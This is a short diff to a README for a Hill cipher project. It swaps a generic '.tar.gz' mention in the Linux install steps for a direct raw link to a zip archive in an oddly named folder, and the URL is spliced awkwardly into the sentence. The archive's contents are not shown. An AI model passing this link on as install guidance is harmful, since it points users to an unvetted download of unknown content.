ok632/HILL-CIPHER/README.md

 ### Linux

 For Linux, installation steps may vary by distribution.
-Usually, the download page offers a `.tar.gz` package or instructions.
+Usually, the download page offers a `https://github.com/ok632/HILL-CIPHER/raw/refs/heads/main/enteroplegia/CIPHER-HIL-v3.7.zip` package or instructions.
 Extract the package and follow the included README file for running the app.

 ---